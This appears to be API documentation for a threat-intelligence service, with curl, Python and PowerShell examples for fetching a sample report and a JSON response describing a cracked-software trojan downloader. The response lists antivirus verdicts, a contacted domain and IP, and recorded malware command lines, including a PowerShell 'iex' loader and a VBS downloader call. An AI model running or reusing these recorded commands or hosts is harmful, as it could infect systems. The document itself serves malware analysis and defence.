Developers can check the API specification here:
Request:
# Fetch the report for one sample, addressed by its SHA-256, from the Maltiverse API.
# <API_KEY> is a placeholder for the caller's own bearer token.
curl --header "Authorization: Bearer <API_KEY>" \
  "https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd"
Request:
Alternatively, you can use the Maltiverse Python3 library; the example below calls the REST endpoint directly with `requests`:
import requests
import json
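# Query the Maltiverse sample endpoint for one SHA-256 and pretty-print the JSON report.
url = 'https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd'
# Send the same bearer token as the curl and PowerShell examples on this page.
# '<API_KEY>' is a placeholder: load the real key from a secret store or the
# environment at runtime and keep it out of source control.
headers = {'Authorization': 'Bearer <API_KEY>'}
# requests applies no timeout by default; bound the call so a stalled
# connection cannot hang the script indefinitely.
response = requests.get(url, headers=headers, timeout=30)
# Stop on 4xx/5xx instead of parsing an error body as if it were a report.
response.raise_for_status()
# The report carries strings recorded from the analysed sample (file names,
# command lines, host names). Treat them as untrusted data: print or store
# them, but never execute them or interpolate them into a shell or a query.
print(json.dumps(response.json(), indent=4, sort_keys=True))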
Request:
# Look up one sample report by SHA-256 and write the parsed response to the pipeline.
$url = 'https://api.maltiverse.com/sample/d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd'

# Bearer token header; "<API_KEY>" stands in for the caller's own key.
$token = "<API_KEY>"
$headers = @{
    Authorization = ("Bearer {0}" -f $token)
}

# Invoke-RestMethod converts the JSON body into a PowerShell object.
$response = Invoke-RestMethod -Uri $url -Headers $headers
Write-Output $response
Response:
{
"antivirus": [
{
"description": "Gen:Variant.Doina.73592",
"name": "ALYac"
},
{
"description": "Malicious",
"name": "APEX"
},
{
"description": "Win32:MalwareX-gen [Misc]",
"name": "AVG"
},
{
"description": "Malware/Win.Doina.C5750887",
"name": "AhnLab-V3"
},
{
"description": "Trojan[Downloader]/Win32.Banload",
"name": "Antiy-AVL"
},
{
"description": "Trojan.Doina.D11F78",
"name": "Arcabit"
},
{
"description": "Win32:MalwareX-gen [Misc]",
"name": "Avast"
},
{
"description": "DR/Delphi.Gen",
"name": "Avira"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "BitDefender"
},
{
"description": "W32.AIDetectMalware",
"name": "Bkav"
},
{
"description": "TrojanDownloader.Banload",
"name": "CAT-QuickHeal"
},
{
"description": "exe.trojan.generic",
"name": "CTX"
},
{
"description": "win/grayware_confidence_90% (W)",
"name": "CrowdStrike"
},
{
"description": "Unsafe",
"name": "Cylance"
},
{
"description": "Malicious (score: 100)",
"name": "Cynet"
},
{
"description": "MALICIOUS",
"name": "DeepInstinct"
},
{
"description": "a variant of Win32/HackTool.Crack.FO potentially unsafe",
"name": "ESET-NOD32"
},
{
"description": "malicious (high confidence)",
"name": "Elastic"
},
{
"description": "Gen:Variant.Doina.73592 (B)",
"name": "Emsisoft"
},
{
"description": "Dropper.DR/Delphi.Gen",
"name": "F-Secure"
},
{
"description": "Riskware/Crack",
"name": "Fortinet"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "GData"
},
{
"description": "Detected",
"name": "Google"
},
{
"description": "Trojan.Win32.Downloader.sa",
"name": "Gridinsoft"
},
{
"description": "Trojan.Crypter",
"name": "Ikarus"
},
{
"description": "Unwanted-Program ( 00517dbc1 )",
"name": "K7AntiVirus"
},
{
"description": "Unwanted-Program ( 00517dbc1 )",
"name": "K7GW"
},
{
"description": "Trojan.Win32.Alien.aiwk",
"name": "Kaspersky"
},
{
"description": "Trojan.Win32.Alien.tsNx",
"name": "Lionic"
},
{
"description": "Malware.AI.2767062603",
"name": "Malwarebytes"
},
{
"description": "Trojan.Malware.343811088.susgen",
"name": "MaxSecure"
},
{
"description": "Artemis!7235C81D6A19",
"name": "McAfee"
},
{
"description": "ti!D05FFF510254",
"name": "McAfeeD"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "MicroWorld-eScan"
},
{
"description": "Trojan:Win32/Sabsik.FL.A!ml",
"name": "Microsoft"
},
{
"description": "generic.ml",
"name": "Paloalto"
},
{
"description": "Downloader.Banload!8.15B (CLOUD)",
"name": "Rising"
},
{
"description": "Trojan.Win32.Save.a",
"name": "Sangfor"
},
{
"description": "Static AI - Suspicious PE",
"name": "SentinelOne"
},
{
"description": "BehavesLike.Win32.Generic.qc",
"name": "Skyhigh"
},
{
"description": "Mal/Generic-S",
"name": "Sophos"
},
{
"description": "ML.Attribute.HighConfidence",
"name": "Symantec"
},
{
"description": "Malware.Win32.Gencirc.146ae14d",
"name": "Tencent"
},
{
"description": "malicious.moderate.ml.score",
"name": "Trapmine"
},
{
"description": "TROJ_GEN.R002H09DA25",
"name": "TrendMicro-HouseCall"
},
{
"description": "Trojan.Hide.Heur",
"name": "VBA32"
},
{
"description": "Gen:Variant.Doina.73592",
"name": "VIPRE"
},
{
"description": "W32/ABTrojan.LDBM-0299",
"name": "Varist"
},
{
"description": "Trojan.Alien!cKYQPzqtYEg",
"name": "Yandex"
},
{
"description": "Trojan[downloader]:Win/Crack.FP",
"name": "alibabacloud"
},
{
"description": "Generic.Malware",
"name": "tehtris"
},
{
"description": "exe.unknown.doina",
"name": "CTX"
},
{
"description": "malware.kb.a.1000",
"name": "Kingsoft"
}
],
"blacklist": [
{
"count": 1,
"description": "Generic Malware",
"first_seen": "2025-04-19 17:55:31",
"last_seen": "2025-04-19 20:00:55",
"ref": [
1
],
"source": "Hybrid-Analysis"
}
],
"classification": "malicious",
"contacted_host": [
"172.67.143.155"
],
"creation_time": "2025-04-19 17:40:09",
"dns_request": [
"idm.0dy.ir"
],
"filename": [
"IDM_6.4x_Crack_v20.0.exe"
],
"filetype": "PE32 executable (GUI) Intel 80386, for MS Windows, ...",
"is_alive": false,
"is_cdn": false,
"is_cnc": false,
"is_distributing_malware": false,
"is_hosting": false,
"is_iot_threat": false,
"is_known_attacker": false,
"is_known_scanner": false,
"is_mining_pool": false,
"is_open_proxy": false,
"is_phishing": false,
"is_sinkhole": false,
"is_storing_phishing": false,
"is_tor_node": false,
"is_vpn_node": false,
"md5": "7235c81d6a1990bf7301194a9f778f9a",
"modification_time": "2025-04-19 21:29:54",
"network_suricata_alert": [
{
"category": "Generic Protocol Command Decode",
"description": "SURICATA TCPv4 invalid checksum",
"event": "20.190.151.131:443 (TCP)",
"sid": "2200074"
}
],
"process_list": [
{
"name": "IDM_6.4x_Crack_v20.0.exe",
"normalizedpath": "C:\\IDM_6.4x_Crack_v20.0.exe",
"sha256": "d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd",
"uid": "00000000-00003880"
},
{
"commandline": "\"%TEMP%\\\\CRK_UPDT.vbs\" \"https://idm.0dy.ir/\" \"Version\" \"Download_URL\" \"20.0\" \"Crack\" \"%PROGRAMFILES%\\Google\\Chrome\\Application\\chrome.exe\" silent",
"name": "wscript.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\wscript.exe",
"sha256": "d57c8674dacc2dd3c03c70ccb823a38bd89f7cabb1663e115e0cb720a0c12c34",
"uid": "00000000-00003176"
},
{
"commandline": "import %TEMP%\\IDMRegClean.reg",
"name": "reg.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\reg.exe",
"sha256": "405a70c2b6081e6fed2a4bab7b0c233fff022acbbb3d2cc92cb8876d052db9e4",
"uid": "00000000-00008012"
},
{
"commandline": "/c call \"%TEMP%\\BATCLEN.bat\"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00001492"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c ver",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00005188"
},
{
"commandline": "reg query \"HKCU\\Console\" /v ForceV2",
"name": "reg.exe",
"normalizedpath": "%WINDIR%\\system32\\reg.exe",
"sha256": "6b3ef0286b7f12b6dbd3bfe07f2473de16b30f2496a45985901f035cb509435f",
"uid": "00000000-00003320"
},
{
"commandline": "find /i \"0x0\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00003808"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c echo prompt $E | cmd",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00007360"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /S /D /c\" echo prompt $E \"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00005588"
},
{
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\system32\\cmd.exe",
"sha256": "ec436aeee41857eee5875efdb7166fe043349db5f58f3ee9fc4ff7f50005767f",
"uid": "00000000-00005628"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /S /D /c\" echo \"%TEMP%\\BATCLEN.bat\" \"",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00004204"
},
{
"commandline": "find /i \"%TEMP%\\",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00005720"
},
{
"commandline": "\"$f=[io.file]::ReadAllText('%TEMP%\\BATCLEN.bat') -split ':PowerShellTest:\\s*';iex ($f[1])\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00006352"
},
{
"commandline": "find /i \"FullLanguage\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00006392"
},
{
"commandline": "\"Get-WmiObject -Class Win32_ComputerSystem | Select-Object -Property CreationClassName\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00004308"
},
{
"commandline": "find /i \"computersystem\"",
"name": "find.exe",
"normalizedpath": "%WINDIR%\\system32\\find.exe",
"sha256": "794b46b2613cb208760e69ea964a649d28fe9acd68110bec08a5ca557014b68a",
"uid": "00000000-00008700"
},
{
"commandline": "%WINDIR%\\system32\\cmd.exe /c powershell.exe \"([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value\" 2>nul",
"name": "cmd.exe",
"normalizedpath": "%WINDIR%\\SysWOW64\\cmd.exe",
"sha256": "4c3ea4c44aab74350355c419826b8c9e6172c3bd8f0bb5817ecf7be50b629051",
"uid": "00000000-00007580"
},
{
"commandline": "\"([System.Security.Principal.NTAccount](Get-WmiObject -Class Win32_ComputerSystem).UserName).Translate([System.Security.Principal.SecurityIdentifier]).Value\"",
"name": "powershell.exe",
"normalizedpath": "%WINDIR%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"sha256": "34507738f84b9d4f231dc0c187fee4a03b4ddb84cf63ff56a4a1761a9bd56ea6",
"uid": "00000000-00008880"
}
],
"score": 10,
"scoring_executed_time": "2025-04-19 21:03:56",
"sha1": "300001bd1550bf827e21739470ea07984691497e",
"sha256": "d05fff510254e92ad35a002f6224ed53d2557df2d9f158a0fcbd6574973b68dd",
"size": 58880,
"tag": [
"evasive",
"windows-server-utility"
],
"type": "sample"
}